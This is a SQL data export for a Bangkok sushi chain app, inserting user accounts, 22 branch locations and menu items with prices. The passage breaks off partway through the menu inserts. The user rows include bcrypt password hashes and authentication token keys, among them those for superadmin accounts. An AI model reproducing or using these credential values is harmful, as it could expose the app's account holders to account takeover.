-- Naeki app data — generated from pb_data/data.db (PocketBase).
-- Source of truth at generation time: 2026-09-16T07:51:56.271Z
-- Do not hand-edit; regenerate with scripts/export-pb-to-neon.mjs style tooling.
-- Wrapped in one transaction; safe to re-apply after truncate.
begin;

-- users -> users (10)
insert into users (id, email, name, role, branch_id, password_hash, token_key, email_visibility, verified, created, updated) values
($naeki$lvyjho8tlj3dn0s$naeki$, $naeki$kate@naeki.dev$naeki$, $naeki$Kate$naeki$, $naeki$customer$naeki$, $naeki$$naeki$, $naeki$$2a$10$HU52XFpjoVG3UFIogydzT.W7F9XR9Kke.hOjaurrtMWRgy5GeKu8m$naeki$, $naeki$bWZXHeRoCMhMw1XhjCe23gIvtl1TLA79EnaJ5Ml7FXd17CLvVE$naeki$, false, false, $naeki$2026-09-14 08:10:24.751Z$naeki$, $naeki$2026-09-15 16:47:57.513Z$naeki$),
($naeki$3y7079sg19h791p$naeki$, $naeki$leo@naeki.dev$naeki$, $naeki$Leo$naeki$, $naeki$customer$naeki$, $naeki$$naeki$, $naeki$$2a$10$RwjgUlBrJNMu9yge8TjLBOeStHOY4kKYVVi86JwHQJnqdbQMJvnrm$naeki$, $naeki$CRVPP5hYoVz7LnghZ4UUuyifrxnyskcmzCmc3Ja7V9kriYvfT0$naeki$, false, false, $naeki$2026-09-14 09:45:36.847Z$naeki$, $naeki$2026-09-14 09:45:36.847Z$naeki$),
($naeki$9a5v5cdc9jt8gc9$naeki$, $naeki$may@naeki.dev$naeki$, $naeki$May$naeki$, $naeki$customer$naeki$, $naeki$$naeki$, $naeki$$2a$10$scUQPVuUFmlSe.AKDKZ22uvhGwd8fqyIWPSUDNOREQEYBmQEnBA16$naeki$, $naeki$xrMnE2I369KMgeqKtw4J2R644pcR1Z7d8iYz2FtO9Kh4B8tafH$naeki$, false, false, $naeki$2026-09-14 09:45:37.234Z$naeki$, $naeki$2026-09-14 09:45:37.234Z$naeki$),
($naeki$zp0kpb2kk5yd2vh$naeki$, $naeki$somchai@naeki.dev$naeki$, $naeki$Somchai$naeki$, $naeki$franchise_owner$naeki$, $naeki$Naeki Go! @ BTS Asok$naeki$, $naeki$$2a$10$rY7BzpvnHMS5SFCOkX4U3.SvLDt8yFZAQXeHTEcqkEbqB2HAFFtj.$naeki$, $naeki$k2uJPBr5mgBVdYH4VGWpOZjXMZAop3LuSUj4LFFjLTdRvahAzw$naeki$, false, false, $naeki$2026-09-14 09:45:37.605Z$naeki$, $naeki$2026-09-14 09:45:37.605Z$naeki$),
($naeki$oyynvx1zf9i8ki6$naeki$, $naeki$niran@naeki.dev$naeki$, $naeki$Niran$naeki$, $naeki$franchise_owner$naeki$, $naeki$Naeki Sushi @ BTS Siam$naeki$, $naeki$$2a$10$l2SMl3kXTS/8XHwNCFexbekohV22xwvueuZ7x.R3bU33IAAMDKpFW$naeki$, $naeki$dpBJVdwaFBjbZMMoFjw769Rf34lzuCFL3yCaP8ch0kF2EQoASD$naeki$, false, false, $naeki$2026-09-14 09:45:38.000Z$naeki$, $naeki$2026-09-14 09:45:38.000Z$naeki$),
($naeki$b5rmsryjgk7dpoj$naeki$, $naeki$malee@naeki.dev$naeki$, $naeki$Malee$naeki$, $naeki$franchise_owner$naeki$, $naeki$NAEKI GO! Central Bangrak$naeki$, $naeki$$2a$10$VAbWq8YBd3lXSkciyevACONkc1xYZo4fPp0NwBh.xSqK.8KGGSfMW$naeki$, $naeki$TPTZMcfQanTvMmJJeBBbus7EKlCuA1v5YHy8xSeI51vof5wkod$naeki$, false, false, $naeki$2026-09-14 09:45:38.367Z$naeki$, $naeki$2026-09-14 09:45:38.367Z$naeki$),
($naeki$645it18qehi4t4d$naeki$, $naeki$admin@naeki.dev$naeki$, $naeki$Admin$naeki$, $naeki$superadmin$naeki$, $naeki$$naeki$, $naeki$$2a$10$GfIXmTpoZtwYMNLj3B/AdOsPGOtL0JfEF9l3/yZ2pkaldviuI8066$naeki$, $naeki$uNK840Zh1cvuIyLdZkpur8dVucq3l6elgY1gpLDa2lQFFH50s2$naeki$, false, false, $naeki$2026-09-14 09:45:38.795Z$naeki$, $naeki$2026-09-14 09:45:38.795Z$naeki$),
($naeki$6q96gvu5j949ue4$naeki$, $naeki$marketing@naeki.dev$naeki$, $naeki$Marketing$naeki$, $naeki$admin$naeki$, $naeki$$naeki$, $naeki$$2a$10$FWdmnyb7xhp9B/Gc7ZXN/OJ4jzoP1WMpqbtFqS9pgcqx8Ux8Hs.7C$naeki$, $naeki$olszhC9UcW2saKv4UJXBNmO8WpzBc8LJyZHy5Kw11ZtAirOFYK$naeki$, false, false, $naeki$2026-09-14 09:45:39.251Z$naeki$, $naeki$2026-09-14 09:45:39.251Z$naeki$),
($naeki$aq5qfrq4t0tbym4$naeki$, $naeki$super@naeki.dev$naeki$, $naeki$Super$naeki$, $naeki$superadmin$naeki$, $naeki$$naeki$, $naeki$$2a$10$flLb//6mY259pD8WhU1DVe4fxKVluDWJpCo7EolUmIK7U29wbaaGW$naeki$, $naeki$B9NPiMmCQGTzq9ps0StzM8cMuZqcuVTji74fLzmj9v242fGs2U$naeki$, false, false, $naeki$2026-09-14 09:45:39.658Z$naeki$, $naeki$2026-09-14 09:45:39.658Z$naeki$),
($naeki$7f3fq8kh8trbzre$naeki$, $naeki$demo@lumen.local$naeki$, $naeki$Demo User$naeki$, $naeki$$naeki$, $naeki$$naeki$, $naeki$$2a$10$0qIawt1ljMhsVBZQDd.zxevFxIZTfAdIP31agtsvOJAWMSKp1BFpW$naeki$, $naeki$SpW74g0DIzBR4Upi0nIcx6OCeymiuHbnwxPjeywbp1W6DO7Avl$naeki$, false, false, $naeki$2026-09-14 10:25:09.902Z$naeki$, $naeki$2026-09-14 10:25:09.902Z$naeki$);

-- branch -> branch (22)
insert into branch (id, name, kind, area, phone, note, location, close_time) values
($naeki$6e4sxal8x7r3mwc$naeki$, $naeki$Naeki Sushi @ BTS Siam$naeki$, $naeki$flagship$naeki$, $naeki$BTS Siam · Pathum Wan$naeki$, $naeki$02 658 4001$naeki$, $naeki$$naeki$, $naeki$BTS Siam station concourse$naeki$, $naeki$21:00$naeki$),
($naeki$wz64gcd8z63ymrz$naeki$, $naeki$Naeki Sushi @ MRT Chatuchak (JJ)$naeki$, $naeki$flagship$naeki$, $naeki$MRT Chatuchak$naeki$, $naeki$063 228 7980$naeki$, $naeki$$naeki$, $naeki$Metro Mall, MRT Blue Line$naeki$, $naeki$20:00$naeki$),
($naeki$r2t1bs612mledxp$naeki$, $naeki$Naeki Go! @ BTS Asok$naeki$, $naeki$go$naeki$, $naeki$BTS Asok · Sukhumvit$naeki$, $naeki$$naeki$, $naeki$$naeki$, $naeki$Sukhumvit station$naeki$, $naeki$20:00$naeki$),
($naeki$f53ocjktjk8u90x$naeki$, $naeki$NAEKI GO! CENTRAL BANGRAM$naeki$, $naeki$go$naeki$, $naeki$Bang Rak$naeki$, $naeki$$naeki$, $naeki$$naeki$, $naeki$Central Bangrak$naeki$, $naeki$20:00$naeki$),
($naeki$t6zo1fc55ssf6y8$naeki$, $naeki$Naeki Sushi @ BTS Sala Daeng$naeki$, $naeki$flagship$naeki$, $naeki$BTS Sala Daeng · Silom$naeki$, $naeki$$naeki$, $naeki$$naeki$, $naeki$BTS Sala Daeng station$naeki$, $naeki$20:00$naeki$),
($naeki$s9jtry64do8ek73$naeki$, $naeki$Naeki Sushi Empire Tower$naeki$, $naeki$flagship$naeki$, $naeki$Sathorn$naeki$, $naeki$02 286 2157$naeki$, $naeki$$naeki$, $naeki$Empire Tower, Unit 208, 2nd Fl., South Sathorn Rd$naeki$, $naeki$19:30$naeki$),
($naeki$nnvp3dgyvz0xeu9$naeki$, $naeki$Naeki Go @ BTS Asok$naeki$, $naeki$go$naeki$, $naeki$BTS Asok · Sukhumvit$naeki$, $naeki$$naeki$, $naeki$$naeki$, $naeki$Sukhumvit station$naeki$, $naeki$20:00$naeki$),
($naeki$y7tggcbii57xkys$naeki$, $naeki$Naeki GO! @ BTS Chong Non-Si$naeki$, $naeki$go$naeki$, $naeki$BTS Chong Non-Si · Narathiwat$naeki$, $naeki$$naeki$, $naeki$$naeki$, $naeki$BTS Chong Nonsi (S3)$naeki$, $naeki$18:00$naeki$),
($naeki$yglpidk6st5oggc$naeki$, $naeki$Naeki GO! Park Silom$naeki$, $naeki$go$naeki$, $naeki$Silom$naeki$, $naeki$062 648 4629$naeki$, $naeki$4.8★ — B1 by the Foodland entrance.$naeki$, $naeki$Park Silom building, Si Lom Rd (Foodland entrance)$naeki$, $naeki$21:00$naeki$),
($naeki$isv0cfw4pjcktq8$naeki$, $naeki$Naeki Go @ BTS Mochit$naeki$, $naeki$go$naeki$, $naeki$BTS Mo Chit$naeki$, $naeki$$naeki$, $naeki$$naeki$, $naeki$Pre-tap-tap fare zone, exits 3–4$naeki$, $naeki$20:00$naeki$),
($naeki$ymnqen7npxwm959$naeki$, $naeki$Naeki GO @ The Trendy$naeki$, $naeki$go$naeki$, $naeki$Sukhumvit 13$naeki$, $naeki$$naeki$, $naeki$$naeki$, $naeki$The Trendy Office, 1st floor$naeki$, $naeki$18:00$naeki$),
($naeki$jw023ccok750d9w$naeki$, $naeki$NAEKI GO! PUNN Tower$naeki$, $naeki$go$naeki$, $naeki$Rama IV$naeki$, $naeki$$naeki$, $naeki$$naeki$, $naeki$PUNN Tower, Rama IV$naeki$, $naeki$18:00$naeki$),
($naeki$59ju2ni7vckv9i3$naeki$, $naeki$NAEKI GO! Central Bangrak$naeki$, $naeki$go$naeki$, $naeki$Bang Rak$naeki$, $naeki$$naeki$, $naeki$$naeki$, $naeki$Central Bangrak$naeki$, $naeki$20:00$naeki$),
($naeki$bo1nkmddzas952i$naeki$, $naeki$Naeki Go! @ BTS Saint Louis$naeki$, $naeki$go$naeki$, $naeki$BTS Saint Louis · Sathorn$naeki$, $naeki$$naeki$, $naeki$$naeki$, $naeki$South Sathorn Rd$naeki$, $naeki$18:30$naeki$),
($naeki$0csp3sxuxmcqf0x$naeki$, $naeki$Naeki GO! Chamchuri Square$naeki$, $naeki$go$naeki$, $naeki$Sam Yan · Chula$naeki$, $naeki$$naeki$, $naeki$$naeki$, $naeki$Chamchuri Square, floor B$naeki$, $naeki$20:00$naeki$),
($naeki$n9os9ir0eg6cifm$naeki$, $naeki$Naeki Go! Sindhorn$naeki$, $naeki$go$naeki$, $naeki$Wireless Rd · Ploenchit$naeki$, $naeki$$naeki$, $naeki$$naeki$, $naeki$Sindhorn Building 3, 1st floor, Witthayu Rd$naeki$, $naeki$17:00$naeki$),
($naeki$ciq4yklnbl7qzhi$naeki$, $naeki$Naeki Go! Rasa Two$naeki$, $naeki$go$naeki$, $naeki$Phetchaburi$naeki$, $naeki$$naeki$, $naeki$$naeki$, $naeki$Rasa Two, Phetchaburi Rd$naeki$, $naeki$19:00$naeki$),
($naeki$0hmhvc4lak7wt4r$naeki$, $naeki$Naeki Go! One Pacific Place$naeki$, $naeki$go$naeki$, $naeki$Sukhumvit 6$naeki$, $naeki$$naeki$, $naeki$$naeki$, $naeki$One Pacific Place$naeki$, $naeki$$naeki$),
($naeki$ohl64d8o4ssc1a2$naeki$, $naeki$Naeki Go @ The Offices at CentralWorld$naeki$, $naeki$go$naeki$, $naeki$Ratchaprasong$naeki$, $naeki$$naeki$, $naeki$$naeki$, $naeki$The Offices at CentralWorld$naeki$, $naeki$19:30$naeki$),
($naeki$rnsjk38st47lzl4$naeki$, $naeki$Naeki Go! The PARQ$naeki$, $naeki$go$naeki$, $naeki$Rama IV$naeki$, $naeki$$naeki$, $naeki$$naeki$, $naeki$The PARQ, Rama IV$naeki$, $naeki$20:00$naeki$),
($naeki$a1golwha61ojp95$naeki$, $naeki$Naeki Go @ Park Ventures$naeki$, $naeki$go$naeki$, $naeki$Ploenchit$naeki$, $naeki$$naeki$, $naeki$$naeki$, $naeki$Park Ventures Ecoplex, Ploenchit$naeki$, $naeki$18:30$naeki$),
($naeki$iwx7gukm6s1a9k0$naeki$, $naeki$Naeki Go! Chula Hospital$naeki$, $naeki$go$naeki$, $naeki$Sam Yan · Chula$naeki$, $naeki$$naeki$, $naeki$$naeki$, $naeki$King Chulalongkorn Memorial Hospital$naeki$, $naeki$18:00$naeki$);

-- menu_item -> menu_item (77)
insert into menu_item (id, name, group_id, price, sub, story, img) values
($naeki$jog3gemex3k1b2p$naeki$, $naeki$Roasted Salmon$naeki$, $naeki$onigiri$naeki$, 45, $naeki$Aburi, torched to order$naeki$, $naeki$$naeki$, $naeki$assets/onigiri_roasted_salmon.jpg$naeki$),
($naeki$417nak5zvrpsjh0$naeki$, $naeki$Salmon Mayo$naeki$, $naeki$onigiri$naeki$, 39, $naeki$Classic filling$naeki$, $naeki$$naeki$, $naeki$assets/onigiri_salmon_mayo.jpg$naeki$),
($naeki$fwnmdjpoizn2g1j$naeki$, $naeki$Salmon Nigiri$naeki$, $naeki$nigiri$naeki$, 45, $naeki$Fresh, the benchmark$naeki$, $naeki$$naeki$, $naeki$assets/salmon_nigiri.jpg$naeki$),
($naeki$p1cm2xvmeqipqtn$naeki$, $naeki$Fatty Salmon Nigiri$naeki$, $naeki$nigiri$naeki$, 55, $naeki$O-toro salmon$naeki$, $naeki$$naeki$, $naeki$assets/fatty_salmon_nigiri.jpg$naeki$),
($naeki$mg70u57c4sgamvo$naeki$, $naeki$Salmon & Ikura Don$naeki$, $naeki$don$naeki$, 189, $naeki$The house favourite$naeki$, $naeki$$naeki$, $naeki$assets/don_salmon_ikura.jpg$naeki$),
($naeki$rzfxpz5usz3cuzz$naeki$, $naeki$Unagi Don$naeki$, $naeki$don$naeki$, 199, $naeki$Grilled eel bowl$naeki$, $naeki$$naeki$, $naeki$assets/don_unagi.jpg$naeki$),
($naeki$53t3tublj1x95ap$naeki$, $naeki$Iced Matcha$naeki$, $naeki$drinks$naeki$, 55, $naeki$Naeki's matcha$naeki$, $naeki$$naeki$, $naeki$assets/drink_matcha_cold.jpg$naeki$),
($naeki$15t2e155x43mfo5$naeki$, $naeki$Matcha Latte$naeki$, $naeki$drinks$naeki$, 59, $naeki$Iced$naeki$, $naeki$$naeki$, $naeki$assets/drink_matcha_latte.jpg$naeki$),
($naeki$id5s3j4riya8998$naeki$, $naeki$Aburi Salmon Roll$naeki$, $naeki$rolls$naeki$, 79, $naeki$6 pcs, torched salmon$naeki$, $naeki$$naeki$, $naeki$assets/roll_aburi_salmon.jpg$naeki$),
($naeki$ateb5we34po0j3v$naeki$, $naeki$California Maki$naeki$, $naeki$rolls$naeki$, 69, $naeki$6 pcs, tobiko mayo$naeki$, $naeki$$naeki$, $naeki$assets/roll_california.jpg$naeki$),
($naeki$iodg73q1ncridqr$naeki$, $naeki$Salmon Sashimi$naeki$, $naeki$sashimi$naeki$, 129, $naeki$With shiso & daikon$naeki$, $naeki$$naeki$, $naeki$assets/sashimi_salmon.jpg$naeki$),
($naeki$p8jvs81xdifhd8c$naeki$, $naeki$Assorted Sushi Set$naeki$, $naeki$sashimi$naeki$, 259, $naeki$Chef's mixed platter$naeki$, $naeki$$naeki$, $naeki$assets/set_assorted.jpg$naeki$),
($naeki$q280afxq6mp4si5$naeki$, $naeki$Ultimate Chirashi Don$naeki$, $naeki$don$naeki$, 259, $naeki$Nine toppings$naeki$, $naeki$$naeki$, $naeki$assets/don_chirashi_ultimate.jpg$naeki$),
($naeki$40o3j4zvs9gxezc$naeki$, $naeki$Matcha Pudding$naeki$, $naeki$drinks$naeki$, 59, $naeki$Japanese-style, light$naeki$, $naeki$$naeki$, $naeki$assets/dessert_matcha_pudding.jpg$naeki$),
($naeki$dj8hyz5gc3topi5$naeki$, $naeki$Ikura Nigiri$naeki$, $naeki$nigiri$naeki$, 65, $naeki$Salmon roe gunkan$naeki$, $naeki$$naeki$, $naeki$assets/ikura_nigiri.jpg$naeki$),
($naeki$zsdxwcj2r0m0jro$naeki$, $naeki$Chicken Teriyaki Onigiri$naeki$, $naeki$onigiri$naeki$, 45, $naeki$Grilled chicken, teriyaki$naeki$, $naeki$$naeki$, $naeki$assets/onigiri_roasted_salmon.jpg$naeki$),
($naeki$rldxqoobsw82fii$naeki$, $naeki$Roasted Salmon Onigiri$naeki$, $naeki$onigiri$naeki$, 45, $naeki$Salt-grilled salmon$naeki$, $naeki$$naeki$, $naeki$assets/onigiri_roasted_salmon.jpg$naeki$),
($naeki$teqbo5y95ltabfl$naeki$, $naeki$Salmon Mayo Onigiri$naeki$, $naeki$onigiri$naeki$, 39, $naeki$Classic filling$naeki$, $naeki$$naeki$, $naeki$assets/onigiri_salmon_mayo.jpg$naeki$),
($naeki$hlqm25rkza9501e$naeki$, $naeki$Salmon Ikura Mayo Onigiri$naeki$, $naeki$onigiri$naeki$, 55, $naeki$With salmon roe$naeki$, $naeki$$naeki$, $naeki$assets/onigiri_salmon_ikura_mayo.jpg$naeki$),
($naeki$srn1i2zwacwtlh9$naeki$, $naeki$Salmon Teriyaki Onigiri$naeki$, $naeki$onigiri$naeki$, 49, $naeki$Teriyaki-glazed salmon$naeki$, $naeki$$naeki$, $naeki$assets/onigiri_salmon_mayo.jpg$naeki$),
($naeki$1qdjgk5n4coe2k5$naeki$, $naeki$Unagi Onigiri$naeki$, $naeki$onigiri$naeki$, 49, $naeki$Grilled eel, tare glaze$naeki$, $naeki$$naeki$, $naeki$assets/onigiri_unagi.jpg$naeki$),
($naeki$iby29uucnb8dewm$naeki$, $naeki$Tuna Mayo Onigiri$naeki$, $naeki$onigiri$naeki$, 35, $naeki$The everyday standard$naeki$, $naeki$$naeki$, $naeki$assets/onigiri_tuna_mayo.jpg$naeki$),
($naeki$d534j7ras8pu8uq$naeki$, $naeki$Mentaiko Onigiri$naeki$, $naeki$onigiri$naeki$, 42, $naeki$Spiced cod roe$naeki$, $naeki$$naeki$, $naeki$assets/onigiri_mentaiko.jpg$naeki$),
($naeki$7yrl90zvbfqbtpu$naeki$, $naeki$Ebiko Salad Onigiri$naeki$, $naeki$onigiri$naeki$, 42, $naeki$Shrimp roe salad$naeki$, $naeki$$naeki$, $naeki$assets/onigiri_ebiko_salad.jpg$naeki$),
($naeki$c8iz31ujf1z257g$naeki$, $naeki$Katsuobushi Onigiri$naeki$, $naeki$onigiri$naeki$, 39, $naeki$Bonito flakes$naeki$, $naeki$$naeki$, $naeki$assets/onigiri_katsuobushi.jpg$naeki$),
($naeki$8cmqbsqfwym1866$naeki$, $naeki$Shiitake Onigiri$naeki$, $naeki$onigiri$naeki$, 40, $naeki$Shiitake mushroom$naeki$, $naeki$$naeki$, $naeki$assets/onigiri_katsuobushi.jpg$naeki$),
($naeki$ql3uwu74g1lifh9$naeki$, $naeki$Ume (Plum) Onigiri$naeki$, $naeki$onigiri$naeki$, 42, $naeki$Japanese pickled plum$naeki$, $naeki$$naeki$, $naeki$assets/onigiri_katsuobushi.jpg$naeki$),
($naeki$t5g2b1gg6baol9i$naeki$, $naeki$Hiyashi Wakame Onigiri$naeki$, $naeki$onigiri$naeki$, 42, $naeki$Seaweed salad$naeki$, $naeki$$naeki$, $naeki$assets/onigiri_salmon_mayo.jpg$naeki$),
($naeki$s05159zg54msbfu$naeki$, $naeki$Salmon Aburi Nigiri$naeki$, $naeki$nigiri$naeki$, 49, $naeki$Seared salmon$naeki$, $naeki$$naeki$, $naeki$assets/salmon_aburi_nigiri.jpg$naeki$),
($naeki$gwgufe3opny1pdz$naeki$, $naeki$Maguro Nigiri$naeki$, $naeki$nigiri$naeki$, 49, $naeki$Tuna$naeki$, $naeki$$naeki$, $naeki$assets/maguro_nigiri.jpg$naeki$),
($naeki$onhpgabjrqw75vx$naeki$, $naeki$Hamachi Nigiri$naeki$, $naeki$nigiri$naeki$, 59, $naeki$Yellowtail$naeki$, $naeki$$naeki$, $naeki$assets/fatty_salmon_nigiri.jpg$naeki$),
($naeki$t2mytjr6s4ql6ib$naeki$, $naeki$Hotate Nigiri$naeki$, $naeki$nigiri$naeki$, 59, $naeki$Scallop$naeki$, $naeki$$naeki$, $naeki$assets/hotate_nigiri.jpg$naeki$),
($naeki$5wgyqwpgh6mvg3g$naeki$, $naeki$Unagi Nigiri$naeki$, $naeki$nigiri$naeki$, 59, $naeki$Grilled eel$naeki$, $naeki$$naeki$, $naeki$assets/unagi_nigiri.jpg$naeki$),
($naeki$xmym9cbyr8tldf7$naeki$, $naeki$Foie Gras Nigiri$naeki$, $naeki$nigiri$naeki$, 89, $naeki$The indulgent one$naeki$, $naeki$$naeki$, $naeki$assets/fatty_salmon_nigiri.jpg$naeki$),
($naeki$i6vwp53egekg7nx$naeki$, $naeki$Tobiko Nigiri$naeki$, $naeki$nigiri$naeki$, 49, $naeki$Flying fish roe$naeki$, $naeki$$naeki$, $naeki$assets/ikura_nigiri.jpg$naeki$),
($naeki$lv3dnhgz9mqbnq8$naeki$, $naeki$Kanimiso Nigiri$naeki$, $naeki$nigiri$naeki$, 49, $naeki$Crab miso$naeki$, $naeki$$naeki$, $naeki$assets/roll_california.jpg$naeki$),
($naeki$x5416ny6ipsvt8n$naeki$, $naeki$Inari Nigiri$naeki$, $naeki$nigiri$naeki$, 45, $naeki$Sweet tofu pouch$naeki$, $naeki$$naeki$, $naeki$assets/don_hotate.jpg$naeki$),
($naeki$c9yegl87vtj69su$naeki$, $naeki$Salmon & Crab Uramaki$naeki$, $naeki$rolls$naeki$, 89, $naeki$5 pcs, tobiko, tamagoyaki$naeki$, $naeki$$naeki$, $naeki$assets/roll_salmon_uramaki.jpg$naeki$),
($naeki$3orjtn18d1k3hho$naeki$, $naeki$Unagi Maki$naeki$, $naeki$rolls$naeki$, 75, $naeki$7 pcs, avocado, sesame$naeki$, $naeki$$naeki$, $naeki$assets/roll_unagi_maki.jpg$naeki$),
($naeki$hjp3ymu7a9nh3o2$naeki$, $naeki$Futomaki$naeki$, $naeki$rolls$naeki$, 65, $naeki$5 pcs, the thick roll$naeki$, $naeki$$naeki$, $naeki$assets/roll_futomaki.jpg$naeki$),
($naeki$8snxcgvusy8g0xj$naeki$, $naeki$Vegetarian Futomaki$naeki$, $naeki$rolls$naeki$, 60, $naeki$5 pcs, vegetable$naeki$, $naeki$$naeki$, $naeki$assets/roll_california.jpg$naeki$),
($naeki$i9o9uwa163vhkkq$naeki$, $naeki$Tuna Hosomaki$naeki$, $naeki$rolls$naeki$, 55, $naeki$6 pcs, small tuna roll$naeki$, $naeki$$naeki$, $naeki$assets/maguro_nigiri.jpg$naeki$),
($naeki$cjkxgs3599fpuyg$naeki$, $naeki$Kampyo Hosomaki$naeki$, $naeki$rolls$naeki$, 45, $naeki$6 pcs, gourd roll$naeki$, $naeki$$naeki$, $naeki$assets/roll_california.jpg$naeki$),
($naeki$3or1zl4afvw6btj$naeki$, $naeki$Salmon Hosomaki$naeki$, $naeki$rolls$naeki$, 55, $naeki$6 pcs$naeki$, $naeki$$naeki$, $naeki$assets/salmon_nigiri.jpg$naeki$),
($naeki$ysct5zh8qhrmm10$naeki$, $naeki$Kanikama Hosomaki$naeki$, $naeki$rolls$naeki$, 45, $naeki$6 pcs, crab stick$naeki$, $naeki$$naeki$, $naeki$assets/roll_california.jpg$naeki$),
($naeki$acnbzm1kc4cko2d$naeki$, $naeki$Tamagoyaki Hosomaki$naeki$, $naeki$rolls$naeki$, 45, $naeki$6 pcs, sweet egg$naeki$, $naeki$$naeki$, $naeki$assets/roll_california.jpg$naeki$),
($naeki$nfh6e80tc59iwsu$naeki$, $naeki$Salmon Sashimi 300g$naeki$, $naeki$sashimi$naeki$, 259, $naeki$Double portion$naeki$, $naeki$$naeki$, $naeki$assets/sashimi_salmon.jpg$naeki$),
($naeki$86dn3vkn882ztvv$naeki$, $naeki$Aburi Salmon Sashimi$naeki$, $naeki$sashimi$naeki$, 149, $naeki$6 cuts, seared$naeki$, $naeki$$naeki$, $naeki$assets/sashimi_aburi.jpg$naeki$),
($naeki$vj794810ssx207z$naeki$, $naeki$Maguro Sashimi$naeki$, $naeki$sashimi$naeki$, 139, $naeki$6 cuts, tuna$naeki$, $naeki$$naeki$, $naeki$assets/sashimi_maguro.jpg$naeki$),
($naeki$xl4uvhm0506ej5c$naeki$, $naeki$Hamachi Sashimi$naeki$, $naeki$sashimi$naeki$, 149, $naeki$6 cuts, yellowtail$naeki$, $naeki$$naeki$, $naeki$assets/sashimi_maguro.jpg$naeki$),
($naeki$gx4fnx3myhjwzzm$naeki$, $naeki$Ikura Sashimi$naeki$, $naeki$sashimi$naeki$, 129, $naeki$Salmon roe 50g$naeki$, $naeki$$naeki$, $naeki$assets/ikura_nigiri.jpg$naeki$),
($naeki$qmmowhjgdkhek28$naeki$, $naeki$Hiyashi Wakame$naeki$, $naeki$sashimi$naeki$, 69, $naeki$Seaweed salad 50g$naeki$, $naeki$$naeki$, $naeki$assets/sashimi_salmon.jpg$naeki$),
($naeki$6a30umy6p88195t$naeki$, $naeki$Salmon Aburi Don$naeki$, $naeki$don$naeki$, 199, $naeki$Seared salmon bowl$naeki$, $naeki$$naeki$, $naeki$assets/don_hotate.jpg$naeki$),
($naeki$rq2ih8l6nv1iwll$naeki$, $naeki$Seared Scallop Don$naeki$, $naeki$don$naeki$, 189, $naeki$Hotate aburi$naeki$, $naeki$$naeki$, $naeki$assets/don_hotate.jpg$naeki$),
($naeki$hy38zwz55zi2r42$naeki$, $naeki$Duo Don (Salmon Avocado)$naeki$, $naeki$don$naeki$, 179, $naeki$Salmon, avocado, tobiko$naeki$, $naeki$$naeki$, $naeki$assets/don_salmon_ikura.jpg$naeki$),
($naeki$q5tllv0ywf99frz$naeki$, $naeki$Fresh Maguro Don$naeki$, $naeki$don$naeki$, 199, $naeki$Tuna sashimi bowl$naeki$, $naeki$$naeki$, $naeki$assets/don_chirashi_ultimate.jpg$naeki$),
($naeki$04c53do5r9h77oc$naeki$, $naeki$Sashimi Bento Set$naeki$, $naeki$don$naeki$, 219, $naeki$With miso soup$naeki$, $naeki$$naeki$, $naeki$assets/bento_1.jpg$naeki$),
($naeki$ax9mqp3btmae0ao$naeki$, $naeki$Miso Soup$naeki$, $naeki$don$naeki$, 39, $naeki$Side$naeki$, $naeki$$naeki$, $naeki$assets/bento_1.jpg$naeki$),
($naeki$egpk08ju5pnzsnx$naeki$, $naeki$Dashi Soup$naeki$, $naeki$don$naeki$, 39, $naeki$Side$naeki$, $naeki$$naeki$, $naeki$assets/bento_1.jpg$naeki$),
($naeki$in09pa18jhi2yy0$naeki$, $naeki$Salmon Nigiri Set$naeki$, $naeki$party$naeki$, 149, $naeki$4 or 6 pcs$naeki$, $naeki$$naeki$, $naeki$assets/set_nigiri_4.jpg$naeki$),
($naeki$itp0ajxdi9lscgx$naeki$, $naeki$Aburi Salmon Set$naeki$, $naeki$party$naeki$, 159, $naeki$4 or 6 pcs, seared$naeki$, $naeki$$naeki$, $naeki$assets/set_aburi_4.jpg$naeki$),
($naeki$nkvn6u5pmdznils$naeki$, $naeki$Party Set A$naeki$, $naeki$party$naeki$, 599, $naeki$Assorted nigiri platter 20 pcs$naeki$, $naeki$$naeki$, $naeki$assets/set_assorted.jpg$naeki$),
($naeki$c5fisc7psa0p02x$naeki$, $naeki$Party Set B$naeki$, $naeki$party$naeki$, 799, $naeki$Mixed platter 30 pcs$naeki$, $naeki$$naeki$, $naeki$assets/set_assorted.jpg$naeki$),
($naeki$29dvo1u11ppw8tc$naeki$, $naeki$Party Set C$naeki$, $naeki$party$naeki$, 1099, $naeki$Large platter 45 pcs$naeki$, $naeki$$naeki$, $naeki$assets/set_assorted.jpg$naeki$),
($naeki$muezva4fgjg9380$naeki$, $naeki$Party Set D$naeki$, $naeki$party$naeki$, 1399, $naeki$Grand sashimi platter$naeki$, $naeki$$naeki$, $naeki$assets/set_assorted.jpg$naeki$),
($naeki$u4keoe1cbsavhwy$naeki$, $naeki$Grand Sashimi$naeki$, $naeki$party$naeki$, 1699, $naeki$Signature sashimi platter$naeki$, $naeki$$naeki$, $naeki$assets/sashimi_salmon.jpg$naeki$),
($naeki$ov3f2oocptqq41k$naeki$, $naeki$Super Sashimi$naeki$, $naeki$party$naeki$, 1999, $naeki$Luxury sashimi platter$naeki$, $naeki$$naeki$, $naeki$assets/sashimi_salmon.jpg$naeki$),
($naeki$4836eracy94801e$naeki$, $naeki$Vegetarian Set$naeki$, $naeki$party$naeki$, 129, $naeki$Plant-based selection$naeki$, $naeki$$naeki$, $naeki$assets/roll_california.jpg$naeki$),
($naeki$isthh92ropit6d5$naeki$, $naeki$Iced Matcha Latte$naeki$, $naeki$drinks$naeki$, 59, $naeki$Iced$naeki$, $naeki$$naeki$, $naeki$assets/drink_matcha_latte.jpg$naeki$),
($naeki$siutt895likpkst$naeki$, $naeki$Iced Americano$naeki$, $naeki$drinks$naeki$, 49, $naeki$For the deadline run$naeki$, $naeki$$naeki$, $naeki$assets/drink_americano.jpg$naeki$),
($naeki$5x75v7664pdass2$naeki$, $naeki$Iced Espresso$naeki$, $naeki$drinks$naeki$, 45, $naeki$Espresso shot$naeki$, $naeki$$naeki$, $naeki$assets/drink_americano.jpg$naeki$),
($naeki$crdrc2uixlzwj84$naeki$, $naeki$Iced Latte$naeki$, $naeki$drinks$naeki$, 55, $naeki$Iced$naeki$, $naeki$$naeki$, $naeki$assets/drink_matcha_latte.jpg$naeki$),
($naeki$8iojfbtul8uih1s$naeki$, $naeki$Iced Mocha$naeki$, $naeki$drinks$naeki$, 59, $naeki$Iced$naeki$, $naeki$$naeki$, $naeki$assets/drink_matcha_latte.jpg$naeki$),
($naeki$gldrjfgstom14e6$naeki$, $naeki$Hot Matcha$naeki$, $naeki$drinks$naeki$, 55, $naeki$Hot$naeki$, $naeki$$naeki$, $naeki$assets/drink_matcha_cold.jpg$naeki$),
